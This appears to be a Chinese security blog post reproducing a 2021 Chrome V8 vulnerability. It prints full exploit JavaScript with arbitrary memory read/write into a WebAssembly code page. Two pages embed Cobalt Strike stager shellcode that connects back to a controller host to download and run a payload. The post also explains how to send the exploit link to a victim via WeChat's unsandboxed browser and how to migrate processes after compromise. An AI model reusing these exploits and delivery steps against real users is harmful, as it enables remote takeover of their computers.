有关Chrome相关0day漏洞复现

字数:3.7k字 | 预计阅读时长:21分钟

背景

2021年护网期间,国外安全研究员发布了chrome浏览器0day漏洞的poc,影响范围覆盖所有chrome版本(Google现已发布修复漏洞的正式版本 90.0.4430.85),受害者只需访问一个含有漏洞利用代码的网页,攻击者便可控制接管计算机。但利用此漏洞需关闭chrome浏览器的沙盒模式,默认情况下此模式处于开启状态,想利用成功还需攻击者在诱导即其他方面多下点功夫。

虽然chrome浏览器的沙盒默认处于开启状态,难以利用成功。但微信自带浏览器同样使用chrome内核,且沙盒默认处于关闭状态,利用微信将是一个不错的选择,目前腾讯官方已发布了修复漏洞的微信版本3.2.1.154。

复现过程

弹计算器

将exploit.html和exploit.js文件放在同一目录

exploit.html:

<script src="exploit.js"></script>

exploit.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
	x = (_arr[0] ^ 0) + 1;

	x = Math.abs(x);
	x -= 2147483647;
	x = Math.max(x, 0);

	x -= 1;
	if(x==-1) x = 0;

	var arr = new Array(x);
	arr.shift();
	var cor = [1.1, 1.2, 1.3];

	return [arr, cor];
}

for(var i=0;i<0x3000;++i)
    foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);

    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

chrome浏览器关闭沙盒(–no-sandbox),直接访问exploit.html,即可触发漏洞,执行shellcode

cs上线

既然顺利执行了弹计算器的shellcode,那么同样可以将shellcode换成cs或者metasploit的shellcode使其上线

使用cs创建监听,生成c语言的64位shellcode

将shellcode的”\“全局替换为”,0”

将替换后的shellcode放入cs.html的shellcode数组

cs.html:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
<script>
     function gc() {
       for (var i = 0; i < 0x80000; ++i) {
           var a = new ArrayBuffer();
      }
  }
   let shellcode = [,0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x50,0x00,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x4c,0x53,0x5a,0x64,0x00,0x41,0x75,0x81,0x1e,0x36,0x90,0x99,0xe4,0x95,0xd0,0x9d,0x05,0x12,0x48,0xf1,0x4b,0xb0,0x98,0x1f,0xd3,0xfc,0xb7,0xdd,0x18,0xb9,0x77,0xeb,0xb3,0x09,0xa2,0x60,0x5d,0x95,0xbb,0x42,0xaa,0xf6,0x85,0x22,0x65,0x4d,0x34,0xf3,0x4b,0xe2,0x93,0x01,0xd3,0x12,0xcd,0xc4,0xaf,0xd2,0xac,0x88,0x13,0xdb,0xd3,0x55,0x19,0x7b,0x2b,0x93,0x76,0xc2,0x2a,0x5f,0x14,0xc5,0x96,0xb4,0xce,0xf8,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x34,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x37,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x35,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x34,0x2e,0x30,0x29,0x0d,0x0a,0x00,0xf6,0x26,0xb3,0xa9,0x5b,0x0c,0x65,0xd7,0xab,0x82,0xf5,0xce,0xdd,0x96,0x09,0x90,0xcf,0x5f,0x49,0x34,0xa2,0xf6,0xd5,0x18,0x35,0x16,0x6c,0xe3,0x55,0x59,0x4e,0x0b,0x7a,0x1d,0xbf,0xb4,0x8b,0x6f,0xeb,0x4d,0x5b,0x24,0x9b,0xd3,0xcd,0x9c,0x59,0x9c,0x90,0xcf,0xce,0x00,0x19,0xb3,0x23,0x02,0x6c,0xfb,0xf7,0x99,0x03,0xbd,0x9b,0x14,0x25,0x58,0x28,0x6e,0x6a,0x41,0x99,0x63,0xc7,0xa0,0x2b,0xbf,0xbc,0x34,0x56,0xa2,0x12,0x9d,0x5d,0xdc,0x1e,0x0a,0x26,0xed,0xdd,0x77,0x6e,0xd4,0x3c,0xe0,0x0b,0xf1,0xf3,0xa6,0xb2,0x2b,0xbb,0xbd,0x5b,0x77,0x60,0xd4,0x4f,0x00,0x22,0x46,0x7c,0x43,0x8f,0x8d,0x54,0xd1,0xa4,0x73,0x2b,0x22,0x1f,0x06,0x48,0xd4,0x98,0x9b,0x42,0x2b,0xc8,0x7e,0x1f,0xaa,0xbb,0x11,0xec,0x7c,0x10,0xf4,0x08,0xaf,0xc1,0x8f,0xfd,0xc1,0x07,0x76,0x3a,0xcf,0xfa,0x03,0xb1,0x9c,0x3f,0x39,0x0d,0xec,0xf9,0x6f,0x7c,0xad,0x21,0xa5,0xdd,0xf1,0x75,0x51,0x81,0x34,0x6e,0x87,0xc1,0x87,0x2b,0x4d,0x0a,0x05,0x50,0xe8,0x50,0xc3,0xaa,0x70,0x92,0xb3,0x4d,0x7c,0x62,0xb9,0xf9,0x86,0x03,0xc2,0x73,0xf9,0xbc,0xa0,0xf5,0x21,0x53,0xb8,0x69,0x07,0x30,0xe1,0xdb,0x21,0x37,0x82,0x0d,0x9a,0xa0,0xc8,0x43,0xe2,0xb2,0x9b,0xf0,0x27,0xf6,0x0f,0x11,0x08,0x5b,0x00,0x6c,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x34,0x00,0x66,0x00,0x00,0x00];
   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
   var wasmModule = new WebAssembly.Module(wasmCode);
   var wasmInstance = new WebAssembly.Instance(wasmModule);
   var main = wasmInstance.exports.main;
   var bf = new ArrayBuffer(8);
   var bfView = new DataView(bf);
   function fLow(f) {
       bfView.setFloat64(0, f, true);
       return (bfView.getUint32(0, true));
  }
   function fHi(f) {
       bfView.setFloat64(0, f, true);
       return (bfView.getUint32(4, true))
  }
   function i2f(low, hi) {
       bfView.setUint32(0, low, true);
       bfView.setUint32(4, hi, true);
       return bfView.getFloat64(0, true);
  }
   function f2big(f) {
       bfView.setFloat64(0, f, true);
       return bfView.getBigUint64(0, true);
  }
   function big2f(b) {
       bfView.setBigUint64(0, b, true);
       return bfView.getFloat64(0, true);
  }
   class LeakArrayBuffer extends ArrayBuffer {
       constructor(size) {
           super(size);
           this.slot = 0xb33f;
      }
  }
   function foo(a) {
       let x = -1;
       if (a) x = 0xFFFFFFFF;
       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
       arr.shift();
       let local_arr = Array(2);
       local_arr[0] = 5.1;//4014666666666666
       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
       arr[0] = 0x1122;
       return [arr, local_arr, buff];
  }
   for (var i = 0; i < 0x10000; ++i)
       foo(false);
   gc(); gc();
  [corrput_arr, rwarr, corrupt_buff] = foo(true);
   corrput_arr[12] = 0x22444;
   delete corrput_arr;
   function setbackingStore(hi, low) {
       rwarr[4] = i2f(fLow(rwarr[4]), hi);
       rwarr[5] = i2f(low, fHi(rwarr[5]));
  }
   function leakObjLow(o) {
       corrupt_buff.slot = o;
       return (fLow(rwarr[9]) - 1);
  }
   let corrupt_view = new DataView(corrupt_buff);
   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
   let idx0Addr = corrupt_buffer_ptr_low - 0x10;
   let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
   let delta = baseAddr + 0x1c - idx0Addr;
   if ((delta % 8) == 0) {
       let baseIdx = delta / 8;
       this.base = fLow(rwarr[baseIdx]);
  } else {
       let baseIdx = ((delta - (delta % 8)) / 8);
       this.base = fHi(rwarr[baseIdx]);
  }
   let wasmInsAddr = leakObjLow(wasmInstance);
   setbackingStore(wasmInsAddr, this.base);
   let code_entry = corrupt_view.getFloat64(13 * 8, true);
   setbackingStore(fLow(code_entry), fHi(code_entry));
   for (let i = 0; i < shellcode.length; i++) {
       corrupt_view.setUint8(i, shellcode[i]);
  }
   main();
</script>

chrome关闭沙盒,直接打开cs.html

上线成功

微信上线

同样使用cs生成c语言的32位shellcode(64位shellcode复现失败)

将”\“全局替换位”,0”,放入weixin.html的shellcode数组

weixin.html:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
<script>
ENABLE_LOG = true;
IN_WORKER = true;

// run calc and hang in a loop
//var shellcode = [#shellcode];
var shellcode = [0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x57,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x84,0x00,0x00,0x00,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x68,0x50,0x00,0x00,0x00,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x70,0x5b,0x31,0xd2,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x52,0x53,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x83,0xc3,0x50,0x31,0xff,0x57,0x57,0x6a,0xff,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x84,0xc3,0x01,0x00,0x00,0x31,0xff,0x85,0xf6,0x74,0x04,0x89,0xf9,0xeb,0x09,0x68,0xaa,0xc5,0xe2,0x5d,0xff,0xd5,0x89,0xc1,0x68,0x45,0x21,0x5e,0x31,0xff,0xd5,0x31,0xff,0x57,0x6a,0x07,0x51,0x56,0x50,0x68,0xb7,0x57,0xe0,0x0b,0xff,0xd5,0xbf,0x00,0x2f,0x00,0x00,0x39,0xc7,0x74,0xb7,0x31,0xff,0xe9,0x91,0x01,0x00,0x00,0xe9,0xc9,0x01,0x00,0x00,0xe8,0x8b,0xff,0xff,0xff,0x2f,0x36,0x51,0x61,0x74,0x00,0x7d,0xa5,0x3d,0xb7,0xb5,0x6f,0x08,0x56,0x93,0x4d,0xc7,0xd7,0x78,0xbb,0x9e,0x67,0xf4,0xe9,0xa5,0xac,0xc1,0x28,0xed,0x72,0xa2,0x29,0xe6,0xb1,0x5e,0x98,0x69,0x69,0xb5,0x52,0x21,0x26,0x42,0x14,0x41,0x7b,0x35,0xfe,0xa3,0xf9,0xec,0xcb,0x5f,0xfd,0x28,0x01,0x0d,0xdb,0xc0,0x5e,0xa6,0xf3,0x1e,0x48,0x83,0xb5,0xd6,0x27,0xa8,0x2e,0x1f,0x3f,0x83,0x9b,0xee,0x78,0x97,0x0c,0xbb,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x42,0x4f,0x49,0x45,0x39,0x3b,0x45,0x4e,0x43,0x41,0x29,0x0d,0x0a,0x00,0xac,0x51,0x21,0x91,0xcf,0x0b,0xf2,0xbe,0xf1,0x9f,0x4f,0x65,0x88,0x96,0x4c,0x82,0x34,0x4d,0xf8,0x4c,0x87,0x07,0x75,0x53,0x32,0x23,0x95,0xcc,0x9b,0x02,0x41,0x41,0x96,0x54,0x20,0xa8,0x96,0x62,0x38,0x6f,0xc8,0xf2,0xb8,0x30,0xf6,0xc9,0xfd,0x1c,0xe8,0xfc,0xe3,0x11,0x28,0xc6,0x7c,0x8a,0x36,0x34,0xe7,0xfd,0x64,0x41,0x08,0xc8,0xa7,0x72,0xdd,0x5a,0x8a,0xbc,0x5f,0x7f,0x66,0xb8,0x3c,0xdf,0x05,0xa0,0x70,0x88,0x11,0x2f,0x60,0x8d,0x75,0x39,0x41,0x01,0x0d,0x3c,0x5a,0xf9,0x10,0xdf,0x04,0xea,0x4d,0x13,0x1a,0x3c,0x7b,0x95,0x7f,0xbe,0x4b,0x6a,0x5c,0x09,0xd6,0xd4,0xa6,0x44,0x40,0x5a,0x2d,0xb2,0xa5,0x10,0x4d,0xe0,0x47,0xc1,0xb0,0xd8,0x42,0x73,0x59,0x16,0x69,0xc8,0x55,0xe9,0x54,0x39,0xf5,0x91,0xe2,0x37,0x1c,0x84,0xc0,0xf3,0x19,0xae,0xf4,0x5d,0x19,0x63,0x1b,0x13,0x16,0xec,0x0c,0x08,0xe1,0x32,0xad,0x59,0x77,0xef,0xa5,0x20,0xbd,0x14,0xfb,0x89,0xde,0xdd,0x93,0x3a,0x0b,0x8b,0x57,0xfb,0x3f,0xc7,0xe7,0x10,0x64,0x42,0x71,0x59,0x2c,0xf9,0xc1,0x16,0x6b,0x51,0xf4,0xc3,0x50,0x7d,0x0d,0x11,0xb9,0x35,0xe5,0x33,0x44,0xa2,0xd3,0xd6,0x40,0x18,0xf4,0xed,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x57,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0xb9,0x00,0x00,0x00,0x00,0x01,0xd9,0x51,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xc6,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0xe8,0xa9,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x34,0x00,0x66,0x00,0x00,0x00]

function print(data) {
}


var not_optimised_out = 0;
var target_function = (function (value) {
    if (value == 0xdecaf0) {
        not_optimised_out += 1;
    }
    not_optimised_out += 1;
    not_optimised_out |= 0xff;
    not_optimised_out *= 12;
});

for (var i = 0; i < 0x10000; ++i) {
    target_function(i);
}


var g_array;
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;

function cb(flag) {
    if (flag == true) {
        return;
    }
    g_array = new Array(0);
    g_array[0] = 0x1dbabe * 2;
    return 'c01db33f';
}

function gc() {
    for (var i = 0; i < 0x10000; ++i) {
        new String();
    }
}

function oobAccess() {
    var this_ = this;
    this.buffer = null;
    this.buffer_view = null;

    this.page_buffer = null;
    this.page_view = null;

    this.prevent_opt = [];

    var kSlotOffset = 0x1f;
    var kBackingStoreOffset = 0xf;

    class LeakArrayBuffer extends ArrayBuffer {
        constructor() {
            super(0x1000);
            this.slot = this;
        }
    }

    this.page_buffer = new LeakArrayBuffer();
    this.page_view = new DataView(this.page_buffer);

    new RegExp({ toString: function () { return 'a' } });
    cb(true);

    class DerivedBase extends RegExp {
        constructor() {
            // var array = null;
            super(
                // at this point, the 4-byte allocation for the JSRegExp `this` object
                // has just happened.
                {
                    toString: cb
                }, 'g'
                // now the runtime JSRegExp constructor is called, corrupting the
                // JSArray.
            );

            // this allocation will now directly follow the FixedArray allocation
            // made for `this.data`, which is where `array.elements` points to.
            this_.buffer = new ArrayBuffer(0x80);
            g_array[8] = this_.page_buffer;
        }
    }

    // try{
    var derived_n = eval(`(function derived_n(i) {
        if (i == 0) {
            return DerivedBase;
        }

        class DerivedN extends derived_n(i-1) {
            constructor() {
                super();
                return;
                ${"this.a=0;".repeat(tDerivedNCount)}
            }
        }

        return DerivedN;
    })`);

    gc();


    new (derived_n(tDerivedNDepth))();

    this.buffer_view = new DataView(this.buffer);
    this.leakPtr = function (obj) {
        this.page_buffer.slot = obj;
        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
    }

    this.setPtr = function (addr) {
        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
    }

    this.read32 = function (addr) {
        this.setPtr(addr);
        return this.page_view.getUint32(0, true, ...this.prevent_opt);
    }

    this.write32 = function (addr, value) {
        this.setPtr(addr);
        this.page_view.setUint32(0, value, true, ...this.prevent_opt);
    }

    this.write8 = function (addr, value) {
        this.setPtr(addr);
        this.page_view.setUint8(0, value, ...this.prevent_opt);
    }

    this.setBytes = function (addr, content) {
        for (var i = 0; i < content.length; i++) {
            this.write8(addr + i, content[i]);
        }
    }
    return this;
}

function trigger() {
    var oob = oobAccess();

    var func_ptr = oob.leakPtr(target_function);
    print('[*] target_function at 0x' + func_ptr.toString(16));

    var kCodeInsOffset = 0x1b;

    var code_addr = oob.read32(func_ptr + kCodeInsOffset);
    print('[*] code_addr at 0x' + code_addr.toString(16));

    oob.setBytes(code_addr, shellcode);

    target_function(0);
}

try{
    print("start running");
    trigger();
}catch(e){
    print(e);
}
</script>

将weixin.html放到vps上或者python起一个本地服务,将链接通过微信发给对方

可以看到微信自带浏览器以关闭沙盒的方式打开

微信上线成功

后话

目前厂家都已经修复了相关漏洞,另外,微信上线时,一旦关闭自带浏览器会话也将随之丢失,所以拿到权限第一件事还是将进程迁移,metasploit有自动迁移进程设置(set autorunscript migrate -n explorer.exe),而cs应该也有相关插件可以做到。还看到其他文章appscan也可以通过利用此方式反制红队,以后有机会试试。

参考链接

http://mp.weixin.qq.com/s/V9rujv89_P0FGhBCfw21mw

http://github.com/r4j0x00/exploits

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。